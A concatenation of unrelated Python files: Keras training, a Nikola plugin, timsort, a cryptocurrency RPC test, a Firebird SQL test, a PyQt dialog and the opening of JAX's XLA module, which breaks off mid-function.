fmt = checkpoint_models_path + 'model.%02d-%.4f.hdf5'
self.model_to_save.save(fmt % (epoch, logs['val_loss']))
# Load our model, added support for Multi-GPUs
num_gpu = len(get_available_gpus())
if num_gpu >= 2:
with tf.device("/cpu:0"):
if pretrained_path is not None:
model = build_encoder_decoder()
model.load_weights(pretrained_path)
else:
model = build_encoder_decoder()
migrate.migrate_model(model)
new_model = multi_gpu_model(model, gpus=num_gpu)
# rewrite the callback: saving through the original model and not the multi-gpu model.
model_checkpoint = MyCbk(model)
else:
if pretrained_path is not None:
new_model = build_encoder_decoder()
new_model.load_weights(pretrained_path)
else:
new_model = build_encoder_decoder()
migrate.migrate_model(new_model)
# count = 0
# for i in new_model.layers:
# count += 1
# print(count)
# sgd = SGD(lr=1e-3, decay=1e-6, momentum=0.9, nesterov=True)
new_model.compile(optimizer='nadam', loss=overall_loss)
print(new_model.summary())
# Summarize then go!
num_cpu = get_available_cpus()
workers = int(round(num_cpu / 2))
print('num_gpu={}\nnum_cpu={}\nworkers={}\ntrained_models_path={}.'.format(num_gpu, num_cpu, workers,
checkpoint_models_path))
# Final callbacks
callbacks = [tensor_board, model_checkpoint, early_stop, reduce_lr]
# Start Fine-tuning
new_model.fit_generator(train_gen(),
steps_per_epoch=num_train_samples // batch_size,
validation_data=valid_gen(),
validation_steps=num_valid_samples // batch_size,
epochs=epochs,
verbose=1,
callbacks=callbacks,
use_multiprocessing=False,
workers=workers
)
|
# -*- coding: utf-8 -*-
# Copyright © 2016-2019, Chris Warrick.
# Permission is hereby granted, free of charge, to any
# person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the
# Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice
# shall be included in all copies or substantial portions of
# the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS
# OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""Post scanner for package indexes."""
from __future__ import unicode_literals
import glob
import sys
import os
from nikola import utils
from nikola.post import Post
from nikola.plugin_categories import PostScanner
LOGGER = utils.get_logger('pkgindex_scan', utils.STDERR_HANDLER)
class PackageIndexScanner(PostScanner):
"""Scanner for package indexes."""
name = "pkgindex_scan"
def scan(self):
"""Scan posts in a package index."""
if 'PKGINDEX_CONFIG' not in self.site.config:
return []
config = self.site.config['PKGINDEX_CONFIG']
compiler = self.site.get_compiler('sample' + config['extension'])
if not self.site.quiet:
print("Scanning package index posts...", end='', file=sys.stderr)
timeline = []
self.site.pkgindex_entries = {}
self.site.pkgindex_by_name = {}
self.site.pkgindex_multiver = {}
for topdir, dirsettings in self.site.config['PKGINDEX_DIRS'].items():
destination, template_name = dirsettings
self.site.pkgindex_entries[topdir] = []
for pkgdir in glob.glob(topdir + "/*"):
if not os.path.isdir(pkgdir):
# Ignore non-directories
continue
post = Post(
os.path.join(pkgdir, 'README.md'),
self.site.config,
destination,
False,
self.site.MESSAGES,
template_name,
compiler
)
post.is_two_file = True
for d in post.meta.values():
d['is_special_entry'] = False
timeline.append(post)
self.site.pkgindex_entries[topdir].append(post)
self._update_name_multiver(post)
if 'special_entries' in config:
for source_path, destination, template_name, topdir in config['special_entries']:
post = Post(
source_path,
self.site.config,
destination,
False,
self.site.MESSAGES,
template_name,
compiler
)
post.is_two_file = True
for d in post.meta.values():
d['is_special_entry'] = True
timeline.append(post)
self.site.pkgindex_entries[topdir].append(post)
self._update_name_multiver(post)
# But wait, we need to change tags on multiver stuff!
# This is kinda... hacky...
maxver = config['versions_supported'][-1]
for versions in self.site.pkgindex_multiver.values():
versions = sorted(versions, key=lambda post: post.meta('dirver'))
v2p = {}
for post in versions:
dirver = post.meta('dirver')
for v in range(dirver, maxver + 1):
v2p[v] = post
p2v = {}
for v, p in v2p.items():
if p in p2v:
p2v[p].append(v)
else:
p2v[p] = [v]
for post, versions in p2v.items():
# And finally, update tags.
tags = post._tags[self.site.default_lang]
tags = [i for i in tags if not (i.startswith('v') and i[1:].isdigit())]
tags += ['v{0}'.format(i) for i in versions]
tags.append('multiver')
post._tags[self.site.default_lang] = tags
post.meta['en']['tags'] = tags
post.meta['en']['multiver'] = True
post.meta['en']['allver'] = versions
if not post.meta['en']['maxver'] and versions[-1] != maxver:
post.meta['en']['maxver'] = versions[-1]
# And generate self.site.pkgindex_by_version
self.site.pkgindex_by_version = {i: [] for i in config['versions_supported']}
for l in self.site.pkgindex_entries.values():
for post in l:
for version in post.meta['en']['allver']:
self.site.pkgindex_by_version[version] = post
return timeline
def supported_extensions(self):
"""Return a list of supported file extensions, or None if such a list isn't known beforehand."""
if 'PKGINDEX_CONFIG' not in self.site.config:
return None
return [self.site.config['PKGINDEX_CONFIG']['extension']]
def _update_name_multiver(self, post):
name = post.meta('slug')
if name in self.site.pkgindex_by_name:
self.site.pkgindex_by_name[name].append(post)
multiver = True
else:
self.site.pkgindex_by_name[name] = [post]
multiver = False
if multiver:
self.site.pkgindex_multiver[name] = self.site.pkgindex_by_name[name]
|
m=600
a=2
resultan_gaya=m*a
print(resultan_gaya)
|
# ref. https://docs.python.org/3/library/random.html
from random import choice
if __name__ == "__main__":
num_seqs = range(20)
print('num_seqs', list(num_seqs))
print('choice(num_seqs)', choice(num_seqs))
print('choice(num_seqs)', choice(num_seqs))
|
from typing import List
def insertionSort(array: List[int], start: int, end: int) -> None:
"""Main insertion sort algorithm\n
Sorts array in-place; returns None
"""
for i in range(start + 1, end): # Iterate through entire array
comparator = array[i] # Make comparison with this value
section = i - 1
while (
section >= start and array[section] > comparator
): # Iterate through array from i to 0 backwards
array[section + 1] = array[
section
] # If comparator <= array[section], move array[section] forward to make space
section -= 1
array[
section + 1
] = comparator # Insert comparator into the array, in its correct position
def merge(array: List[int], start: int, mid: int, end: int) -> int:
"""Merges two arrays"""
start2 = mid + 1
if array[mid] <= array[start2]:
return
while start <= mid and start2 <= end:
if array[start] <= array[start2]:
start += 1
else:
value = array[start2]
index = start2
while index != start:
array[index] = array[index - 1]
index -= 1
array[start] = value
start += 1
mid += 1
start2 += 1
def timSort(array: List[int], run: int = 32) -> None:
"""Main timsort function\n
Sorts array in-place; returns None
"""
# Run insertionsort
for i in range(0, len(array), run):
insertionSort(array, i, min(i + run, len(array)))
# Run merges
size = run
while size < len(array):
for left in range(0, len(array), 2 * size):
mid = left + size - 1
right = min((left + 2 * size - 1), (len(array) - 1))
merge(array, left, mid, right)
size *= 2
if __name__ == "__main__":
try:
from utils import randomSequence
except ModuleNotFoundError:
import os, sys # import shuffler from parent directory
dir_path = os.path.dirname(os.path.realpath(__file__))
parent_dir_path = os.path.abspath(os.path.join(dir_path, os.pardir))
sys.path.insert(0, parent_dir_path)
from utils import randomSequence
print("TIM SORT")
shuffledArray = randomSequence(0, 1000)
print(shuffledArray, "\n")
timSort(shuffledArray)
print(shuffledArray)
|
#!/usr/bin/env python3
# Copyright (c) 2017-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test getblockstats rpc call
#
from test_framework.test_framework import FrancTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
)
import json
import os
import time
TESTSDIR = os.path.dirname(os.path.realpath(__file__))
class GetblockstatsTest(FrancTestFramework):
start_height = 101
max_stat_pos = 2
STATS_NEED_TXINDEX = [
'avgfee',
'avgfeerate',
'maxfee',
'maxfeerate',
'medianfee',
'feerate_percentiles',
'minfee',
'minfeerate',
'totalfee',
'utxo_size_inc',
]
def add_options(self, parser):
parser.add_argument('--gen-test-data', dest='gen_test_data',
default=False, action='store_true',
help='Generate test data')
parser.add_argument('--test-data', dest='test_data',
default='data/rpc_getblockstats.json',
action='store', metavar='FILE',
help='Test data file')
def set_test_params(self):
self.num_nodes = 2
self.extra_args = [['-txindex'], ['-paytxfee=0.003']]
self.setup_clean_chain = True
def get_stats(self):
return [self.nodes[0].getblockstats(hash_or_height=self.start_height + i) for i in range(self.max_stat_pos+1)]
def generate_test_data(self, filename):
mocktime = time.time()
self.nodes[0].generate(101)
self.nodes[0].sendtoaddress(address=self.nodes[1].getnewaddress(), amount=10, subtractfeefromamount=True)
self.nodes[0].generate(1)
self.sync_all()
self.nodes[0].sendtoaddress(address=self.nodes[0].getnewaddress(), amount=10, subtractfeefromamount=True)
self.nodes[0].sendtoaddress(address=self.nodes[0].getnewaddress(), amount=10, subtractfeefromamount=False)
self.nodes[1].sendtoaddress(address=self.nodes[0].getnewaddress(), amount=1, subtractfeefromamount=True)
self.sync_all()
self.nodes[0].generate(1)
self.expected_stats = self.get_stats()
blocks = []
tip = self.nodes[0].getbestblockhash()
blockhash = None
height = 0
while tip != blockhash:
blockhash = self.nodes[0].getblockhash(height)
blocks.append(self.nodes[0].getblock(blockhash, 0))
height += 1
to_dump = {
'blocks': blocks,
'mocktime': int(mocktime),
'stats': self.expected_stats,
}
with open(filename, 'w', encoding="utf8") as f:
json.dump(to_dump, f, sort_keys=True, indent=2)
def load_test_data(self, filename):
with open(filename, 'r', encoding="utf8") as f:
d = json.load(f)
blocks = d['blocks']
mocktime = d['mocktime']
self.expected_stats = d['stats']
# Set the timestamps from the file so that the nodes can get out of Initial Block Download
self.nodes[0].setmocktime(mocktime)
self.nodes[1].setmocktime(mocktime)
for b in blocks:
self.nodes[0].submitblock(b)
def run_test(self):
test_data = os.path.join(TESTSDIR, self.options.test_data)
if self.options.gen_test_data:
self.generate_test_data(test_data)
else:
self.load_test_data(test_data)
self.sync_all()
stats = self.get_stats()
expected_stats_noindex = []
for stat_row in stats:
expected_stats_noindex.append({k: v for k, v in stat_row.items() if k not in self.STATS_NEED_TXINDEX})
# Make sure all valid statistics are included but nothing else is
expected_keys = self.expected_stats[0].keys()
assert_equal(set(stats[0].keys()), set(expected_keys))
assert_equal(stats[0]['height'], self.start_height)
assert_equal(stats[self.max_stat_pos]['height'], self.start_height + self.max_stat_pos)
for i in range(self.max_stat_pos+1):
self.log.info('Checking block %d\n' % (i))
assert_equal(stats[i], self.expected_stats[i])
# Check selecting block by hash too
blockhash = self.expected_stats[i]['blockhash']
stats_by_hash = self.nodes[0].getblockstats(hash_or_height=blockhash)
assert_equal(stats_by_hash, self.expected_stats[i])
# Check with the node that has no txindex
stats_no_txindex = self.nodes[1].getblockstats(hash_or_height=blockhash, stats=list(expected_stats_noindex[i].keys()))
assert_equal(stats_no_txindex, expected_stats_noindex[i])
# Make sure each stat can be queried on its own
for stat in expected_keys:
for i in range(self.max_stat_pos+1):
result = self.nodes[0].getblockstats(hash_or_height=self.start_height + i, stats=[stat])
assert_equal(list(result.keys()), [stat])
if result[stat] != self.expected_stats[i][stat]:
self.log.info('result[%s] (%d) failed, %r != %r' % (
stat, i, result[stat], self.expected_stats[i][stat]))
assert_equal(result[stat], self.expected_stats[i][stat])
# Make sure only the selected statistics are included (more than one)
some_stats = {'minfee', 'maxfee'}
stats = self.nodes[0].getblockstats(hash_or_height=1, stats=list(some_stats))
assert_equal(set(stats.keys()), some_stats)
# Test invalid parameters raise the proper json exceptions
tip = self.start_height + self.max_stat_pos
assert_raises_rpc_error(-8, 'Target block height %d after current tip %d' % (tip+1, tip),
self.nodes[0].getblockstats, hash_or_height=tip+1)
assert_raises_rpc_error(-8, 'Target block height %d is negative' % (-1),
self.nodes[0].getblockstats, hash_or_height=-1)
# Make sure not valid stats aren't allowed
inv_sel_stat = 'asdfghjkl'
inv_stats = [
[inv_sel_stat],
['minfee' , inv_sel_stat],
[inv_sel_stat, 'minfee'],
['minfee', inv_sel_stat, 'maxfee'],
]
for inv_stat in inv_stats:
assert_raises_rpc_error(-8, 'Invalid selected statistic %s' % inv_sel_stat,
self.nodes[0].getblockstats, hash_or_height=1, stats=inv_stat)
# Make sure we aren't always returning inv_sel_stat as the culprit stat
assert_raises_rpc_error(-8, 'Invalid selected statistic aaa%s' % inv_sel_stat,
self.nodes[0].getblockstats, hash_or_height=1, stats=['minfee' , 'aaa%s' % inv_sel_stat])
assert_raises_rpc_error(-8, 'One or more of the selected stats requires -txindex enabled',
self.nodes[1].getblockstats, hash_or_height=self.start_height + self.max_stat_pos)
# Mainchain's genesis block shouldn't be found on regtest
assert_raises_rpc_error(-5, 'Block not found', self.nodes[0].getblockstats,
hash_or_height='000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1b60a8ce26f')
if __name__ == '__main__':
GetblockstatsTest().main()
|
#coding:utf-8
#
# id: bugs.core_4331
# title: LAG, LEAD and NTH_VALUE raise error when the second argument is NULL
# decription:
# tracker_id: CORE-4331
# min_versions: ['3.0']
# versions: 3.0
# qmid: None
import pytest
from firebird.qa import db_factory, isql_act, Action
# version: 3.0
# resources: None
substitutions_1 = []
init_script_1 = """"""
db_1 = db_factory(page_size=4096, sql_dialect=3, init=init_script_1)
test_script_1 = """
recreate table test(id int primary key, x int, y int);
commit;
insert into test values(101, 1, 10);
insert into test values(102, 2, 20);
insert into test values(103, 3, 30);
insert into test values(104, 4, 40);
insert into test values(105, 5, 50);
insert into test values(106, 6, 60);
insert into test values(107, 7, 70);
commit;
set list on;
select
id
,lag(x,null)over(order by id) x_lag
,lead(x,null)over(order by id) x_lead
,nth_value(x,null)over(order by id) x_nth
from test t
order by id;
"""
act_1 = isql_act('db_1', test_script_1, substitutions=substitutions_1)
expected_stdout_1 = """
ID 101
X_LAG <null>
X_LEAD <null>
X_NTH <null>
ID 102
X_LAG <null>
X_LEAD <null>
X_NTH <null>
ID 103
X_LAG <null>
X_LEAD <null>
X_NTH <null>
ID 104
X_LAG <null>
X_LEAD <null>
X_NTH <null>
ID 105
X_LAG <null>
X_LEAD <null>
X_NTH <null>
ID 106
X_LAG <null>
X_LEAD <null>
X_NTH <null>
ID 107
X_LAG <null>
X_LEAD <null>
X_NTH <null>
"""
@pytest.mark.version('>=3.0')
def test_1(act_1: Action):
act_1.expected_stdout = expected_stdout_1
act_1.execute()
assert act_1.clean_stdout == act_1.clean_expected_stdout
|
# Module providing evasion attacks.
from reports.report_utility import ReportUtility
from reports.report_html import HtmlReport
from reports.report_ipynb import IpynbReport
|
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtCore import QAbstractTableModel, Qt
import pandas as pd
from pandas import DataFrame as DF
class table_view_model(QAbstractTableModel):
def __init__(self, data):
QAbstractTableModel.__init__(self)
self._data = data
def rowCount(self, parent=None):
return self._data.shape[0]
def columnCount(self, parnet=None):
return self._data.shape[1]
def data(self, index, role=Qt.DisplayRole):
if index.isValid():
if role == Qt.DisplayRole:
return str(self._data.iloc[index.row(), index.column()])
return None
def headerData(self, col, orientation, role):
if orientation == Qt.Horizontal and role == Qt.DisplayRole:
return self._data.columns[col]
return None
class Ui_Sheet_selector(object):
'''Sheet selector takes the work book name as input and allows the user to select the require sheet he is lookin to add in the tool'''
def __init__(self,parent=None):
super(Ui_Sheet_selector,self).__init__()
self.File_name=""
self.Parent_window=parent
def setupUi(self, Sheet_selector):
self.Sheet_selector1=Sheet_selector
Sheet_selector.setObjectName("Sheet_selector")
Sheet_selector.resize(655, 300)
Sheet_selector.setMaximumSize(QtCore.QSize(655, 300))
self.groupBox = QtWidgets.QGroupBox(Sheet_selector)
self.groupBox.setGeometry(QtCore.QRect(0, 3, 651, 291))
self.groupBox.setObjectName("groupBox")
self.groupBox.setTitle("Select_the_sheet")
self.File_name_viewer = QtWidgets.QLineEdit(self.groupBox)
self.File_name_viewer.setGeometry(QtCore.QRect(10, 20, 521, 21))
self.File_name_viewer.setInputMask("")
self.File_name_viewer.setObjectName("File_name_viewer")
self.Excel_Data_Viewer = QtWidgets.QTableView(self.groupBox)
self.Excel_Data_Viewer.setGeometry(QtCore.QRect(10, 80, 635, 205))
#self.File_name_viewer.isEnabled(False)
self.Sheet_names_selector_combo = QtWidgets.QComboBox(self.groupBox)
self.Sheet_names_selector_combo.setGeometry(QtCore.QRect(10, 50, 521, 21))
self.Sheet_names_selector_combo.setObjectName("Sheet_names_selector_combo")
self.Sheet_names_selector_combo.currentTextChanged.connect(self.Show_the_few_data_in_data_table)
if self.Parent_window!=None:
self.File_name_viewer.setText(self.Parent_window.File_name)
self.File_name_viewer.setDisabled(True)
if len(self.Parent_window.New_excel_data.sheet_names)>0:
for sheet_name in self.Parent_window.New_excel_data.sheet_names:
self.Sheet_names_selector_combo.addItem(sheet_name)
self.Show_the_few_data_in_data_table()
self.Ok_buttion = QtWidgets.QPushButton(self.groupBox)
self.Ok_buttion.setGeometry(QtCore.QRect(540, 50, 75, 23))
self.Ok_buttion.clicked.connect(self.Create_the_data_frame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.Ok_buttion.sizePolicy().hasHeightForWidth())
self.Ok_buttion.setSizePolicy(sizePolicy)
self.Ok_buttion.setObjectName("Ok_buttion")
self.Ok_buttion.setText('Ok')
QtCore.QMetaObject.connectSlotsByName(Sheet_selector)
def Show_the_few_data_in_data_table(self):
''' This function takes the work book sheet name ( Data frame) as input and shows the first few rows(5) in the Table Widget'''
if self.Sheet_names_selector_combo.currentText()!="":
sheetname=self.Parent_window.New_excel_data.parse(sheetname=self.Sheet_names_selector_combo.currentText())
self.modle=table_view_model(sheetname)
self.Excel_Data_Viewer.setModel(self.modle)
self.Excel_Data_Viewer.show()
def Create_the_data_frame(self):
''' This Function takes the sheet name from the excel file'''
if self.Sheet_names_selector_combo.currentText()!="":
#self.Parent_window.Loaded=self.Parent_window.New_excel_data.parse(sheetname=self.Sheet_names_selector_combo.currentText())
self.Parent_window.Parent_window.Loaded_Data_File_count.append('File_'+str(len(self.Parent_window.Parent_window.Loaded_Data_File_count)+1))
self.New_File_Name=self.Parent_window.Parent_window.Loaded_Data_File_count[len(self.Parent_window.Parent_window.Loaded_Data_File_count)-1]
Temp_file=self.Parent_window.New_excel_data.parse(sheetname=self.Sheet_names_selector_combo.currentText())
# Converting the DF to Dict for use
Temp_file1={}
for name in Temp_file.columns: Temp_file1[name]=list(Temp_file[name])
self.Parent_window.Parent_window.Loaded_Data_Files[self.New_File_Name]={'Full_Rec_Summary':Temp_file1}
self.Parent_window.Parent_window.Loaded_Data_File_Raw_Data[self.New_File_Name]=DF(Temp_file1)
#self.Parent_window.Parent_window.Refresh_data_table_items()
self.Close_the_excel_sheet_selector()
def Close_the_excel_sheet_selector(self):
''' Closes the current window excel sheet selector'''
self.Sheet_selector1.close()
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
Sheet_selector = QtWidgets.QDialog()
ui = Ui_Sheet_selector()
ui.setupUi(Sheet_selector)
Sheet_selector.show()
sys.exit(app.exec_())
|
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import defaultdict, deque
import itertools as it
import operator as op
import re
from typing import (Any, Callable, Dict, List, Optional, Sequence, Set, Type,
Tuple, Union, NamedTuple)
from warnings import warn
import weakref
from absl import logging
import numpy as np
from ..config import config
from .. import core
from jax._src import ad_util
from jax._src import dtypes
from .. import linear_util as lu
from jax._src import source_info_util
from jax._src.abstract_arrays import (make_shaped_array, array_types)
from ..core import (ConcreteArray, ShapedArray, AbstractToken,
Literal, pp_eqn_compact, raise_to_shaped, abstract_token)
from ..errors import UnexpectedTracerError
from jax._src.pprint_util import pp
from .._src.util import (partial, partialmethod, cache, prod, unzip2,
extend_name_stack, wrap_name, safe_zip, safe_map)
from ..lib import xla_bridge as xb
from ..lib import xla_client as xc
from . import partial_eval as pe
from . import ad
from . import masking
map, unsafe_map = safe_map, map
zip, unsafe_zip = safe_zip, zip
xe = xc._xla
xops = xc._xla.ops
# Types
Backend = Any # xc.LocalBackend (why does mypy not like this?)
Device = Any # xc.Device
PyLocalBuffer = Any
XlaOp = Any # xla_extension.XlaOp
XlaShape = Any # xla_client.Shape
XlaComputationBuilder = Any # xla_bridge._JaxComputationBuilder
XlaExecutable = Any # xla_extension.LocalExecutable
# This flag is set on exit; no logging should be attempted
_on_exit = False
def compile_or_get_cached(backend, computation, compile_options):
# Avoid import cycle between jax and jax.experimental
from jax.experimental.compilation_cache import compilation_cache as cc
if cc.is_initialized():
cached_executable = cc.get_executable(computation, compile_options)
if cached_executable is not None:
logging.info('Persistent compilation cache hit')
return cached_executable
else:
compiled = backend_compile(backend, computation, compile_options)
cc.put_executable(computation, compile_options, compiled)
return compiled
return backend_compile(backend, computation, compile_options)
def identity(x): return x
_scalar_types = dtypes.python_scalar_dtypes.keys()
# unit representation
def _make_unit_constant(c): return xb.constant_general(c, np.zeros((), dtype=np.dtype('bool')))
def _make_unit_shape(_): return (xc.Shape.array_shape(np.dtype('bool'), ()),)
def _device_put_unit(_, device):
backend = xb.get_device_backend(device)
return (backend.buffer_from_pyval(np.zeros((), dtype=np.dtype('bool')),
device),)
def _make_array_shape(a):
if a.dtype is dtypes.float0:
return (xc.Shape.array_shape(np.dtype('bool'), a.shape),)
else:
return (xc.Shape.array_shape(a.dtype, a.shape),)
def _get_canonical_source_file(frame: source_info_util.Frame):
source_file = frame.file_name
if config.jax_hlo_source_file_canonicalization_regex:
source_file = re.sub(config.jax_hlo_source_file_canonicalization_regex,
'', source_file)
return source_file
tracebacks = {}
def make_op_metadata(primitive: core.Primitive,
params: Dict, *,
name_stack: str = "",
source_info: Optional[source_info_util.Traceback] = None
) -> xc.OpMetadata:
tracebacks[str(pp(name_stack) >> pp_eqn_compact(primitive.name, params))] = source_info
frame = source_info_util.user_frame(source_info) if source_info else None
return xc.OpMetadata(
op_type=primitive.name,
op_name=str(pp(name_stack) >> pp_eqn_compact(primitive.name, params)),
source_file=_get_canonical_source_file(frame) if frame else None,
source_line=frame.line_num if frame else None)
### handlers
xb.register_constant_handler(core.Unit, lambda c, *_: _make_unit_constant(c))
def aval_to_xla_shapes(aval):
try:
return xla_shape_handlers[type(aval)](aval)
except KeyError as err:
raise TypeError(f"No xla_shape_handler for type: {type(aval)}") from err
xla_shape_handlers: Dict[Type[core.AbstractValue], Callable] = {
core.AbstractUnit: _make_unit_shape,
ShapedArray: _make_array_shape,
ConcreteArray: _make_array_shape,
}
def aval_to_result_handler(device: Optional[Device], aval: core.AbstractValue) -> Callable:
try:
return xla_result_handlers[type(aval)](device, aval)
except KeyError as err:
raise TypeError(f"No xla_result_handler for type: {type(aval)}") from err
def array_result_handler(device: Optional[Device], aval: core.ShapedArray):
if aval.dtype is dtypes.float0:
return lambda _: np.zeros(aval.shape, dtypes.float0)
return partial(make_device_array, raise_to_shaped(aval), device)
xla_result_handlers: Dict[Type[core.AbstractValue], Callable[..., Callable]] = {
core.AbstractUnit: lambda _, __: lambda _: core.unit,
ShapedArray: array_result_handler,
ConcreteArray: array_result_handler,
}
def device_put(x, device: Optional[Device] = None) -> Tuple[Any]:
x = canonicalize_dtype(x)
try:
return device_put_handlers[type(x)](x, device)
except KeyError as err:
raise TypeError(f"No device_put handler for type: {type(x)}") from err
def _device_put_array(x, device: Optional[Device]):
backend = xb.get_device_backend(device)
if x.dtype is dtypes.float0:
x = np.zeros(x.shape, dtype=np.dtype(bool))
return (backend.buffer_from_pyval(x, device),)
def _device_put_scalar(x, device):
return _device_put_array(dtypes.coerce_to_array(x), device)
device_put_handlers: Dict[Any, Callable[[Any, Optional[Device]], Tuple[Any]]] = {
core.Unit: _device_put_unit
}
device_put_handlers.update((t, _device_put_array) for t in array_types)
device_put_handlers.update((t, _device_put_scalar) for t in _scalar_types)
# TODO(mattjj): try to remove this canonicalize_dtype stuff
def canonicalize_dtype(x):
typ = type(x)
handler = canonicalize_dtype_handlers.get(typ)
if handler: return handler(x)
for typ in typ.mro():
handler = canonicalize_dtype_handlers.get(typ)
if handler: return handler(x)
if hasattr(x, '__jax_array__'):
return canonicalize_dtype(x.__jax_array__())
raise TypeError(f"No canonicalize_dtype handler for type: {type(x)}")
def _canonicalize_ndarray_dtype(x):
return np.asarray(x, dtypes.canonicalize_dtype(dtypes.result_type(x)))
def _canonicalize_python_scalar_dtype(typ, x):
return np.asarray(
x, dtypes.canonicalize_dtype(dtypes._scalar_type_to_dtype(typ, x)))
canonicalize_dtype_handlers: Dict[Any, Callable] = {core.Unit: identity}
canonicalize_dtype_handlers.update(
(t, _canonicalize_ndarray_dtype) for t in array_types)
canonicalize_dtype_handlers.update(
(t, partial(_canonicalize_python_scalar_dtype, t)) for t in _scalar_types)
def abstractify(x) -> core.AbstractValue:
typ = type(x)
aval_fn = pytype_aval_mappings.get(typ)
if aval_fn: return aval_fn(x)
for typ in typ.mro():
aval_fn = pytype_aval_mappings.get(typ)
if aval_fn: return aval_fn(x)
if hasattr(x, '__jax_array__'):
return abstractify(x.__jax_array__())
raise TypeError(f"Argument '{x}' of type '{type(x)}' is not a valid JAX type")
def _make_abstract_python_scalar(typ, val):
return ShapedArray((), dtypes._scalar_type_to_dtype(typ, val), weak_type=True)
pytype_aval_mappings: Dict[Any, Callable[[Any], core.AbstractValue]] = {
core.Unit: lambda _: core.abstract_unit,
}
pytype_aval_mappings.update((t, make_shaped_array) for t in array_types)
pytype_aval_mappings.update(
(t, partial(_make_abstract_python_scalar, t)) for t in _scalar_types)
# We can optionally set a Jaxpr rewriter that can be applied just before
# compilation. This mechanism is used for compiling id_tap, we can
# remove it once we bring the id_tap implementation into the core.
outfeed_rewriter: Optional[Callable[[core.Jaxpr], core.Jaxpr]] = None
def apply_outfeed_rewriter(jaxpr: core.Jaxpr) -> core.Jaxpr:
if outfeed_rewriter is not None:
return outfeed_rewriter(jaxpr)
else:
return jaxpr
outfeed_primitives: Set[core.Primitive] = set()
def jaxpr_uses_outfeed(jaxpr: core.Jaxpr) -> bool:
"""Finds if there are outfeed primitives anywhere inside a Jaxpr."""
return any(primitive_uses_outfeed(eqn.primitive, eqn.params)
for eqn in jaxpr.eqns)
def _param_uses_outfeed(param):
if type(param) is core.Jaxpr:
if jaxpr_uses_outfeed(param):
return True
elif type(param) is core.ClosedJaxpr:
if jaxpr_uses_outfeed(param.jaxpr):
return True
return False
def primitive_uses_outfeed(prim: core.Primitive, params: Dict) -> bool:
if prim in outfeed_primitives:
return True
for param in params.values():
if isinstance(param, tuple):
if any(unsafe_map(_param_uses_outfeed, param)):
return True
elif _param_uses_outfeed(param):
return True
return False
### op-by-op execution
ArgSpec = Tuple[core.AbstractValue, Optional[Device]]
def arg_spec(x: Any) -> ArgSpec:
aval = abstractify(x)
try:
return aval, x._device
except:
return aval, None
def apply_primitive(prim, *args, **params):
"""Impl rule that compiles and runs a single primitive 'prim' using XLA."""
compiled_fun = xla_primitive_callable(prim, *unsafe_map(arg_spec, args), **params)
return compiled_fun(*args)
def _partition_outputs(avals, outs):
nouts = [aval._num_buffers for aval in avals]
if config.jax_enable_checks:
assert sum(nouts) == len(outs), f"Internal error: sum(nouts)={sum(nouts)} should equal len(outs)={len(outs)}."
outs = iter(outs)
return [[next(outs) for _ in range(nout)] for nout in nouts]
@cache()
def xla_primitive_callable(prim, *arg_specs: ArgSpec, **params):
avals, arg_devices = unzip2(arg_specs)
donated_invars = (False,) * len(arg_specs)
device = _device_from_arg_devices(arg_devices)
backend = xb.get_device_backend(device)
if primitive_uses_outfeed(prim, params):
# We use the _xla_callable path, where we pre-process the primitives
def prim_fun(*args):
return prim.bind(*args, **params)
return _xla_callable(lu.wrap_init(prim_fun), device, None, "prim", donated_invars,
*arg_specs)
aval_out = prim.abstract_eval(*avals, **params)
if not prim.multiple_results:
handle_result = aval_to_result_handler(device, aval_out)
else:
handlers = map(partial(aval_to_result_handler, device), aval_out)
handle_result = lambda *bufs:\
tuple(handler(*bs) for handler, bs in zip(handlers, _partition_outputs(aval_out, bufs)))
tuple_args = len(avals) > 100
if prim in initial_style_translations:
nreps = initial_style_primitive_replicas(params)
else:
nreps = 1
if nreps > xb.device_count(backend):
raise ValueError(
f"compiling a primitive computation `{prim}` that requires {nreps} "
f"replicas, but only {xb.device_count(backend)} XLA devices are "
f"available on backend {backend.platform}.")
built_c = primitive_computation(prim, AxisEnv(nreps, (), ()), backend,
tuple_args, *avals, **params)
options = xb.get_compile_options(
num_replicas=nreps,
num_partitions=1,
device_assignment=device and (device.id,))
options.parameter_is_tupled_arguments = tuple_args
compiled = backend_compile(backend, built_c, options)
if nreps == 1:
return partial(_execute_compiled_primitive, prim, compiled, handle_result)
else:
return partial(_execute_replicated_primitive, prim, compiled, handle_result)
def _device_from_arg_devices(devices: Sequence[Optional[Device]]) -> Optional[Device]:
"""Given devices of inputs, determine where to perform a computation.
Args:
devices: list where each element is a either a `Device` instance or `None`.
Returns:
A `Device` instance or None.
Raises:
ValueError if input devices are inconsistent.
"""
try:
device, = {d for d in devices if d is not None} or (None,)
return device
except ValueError as err:
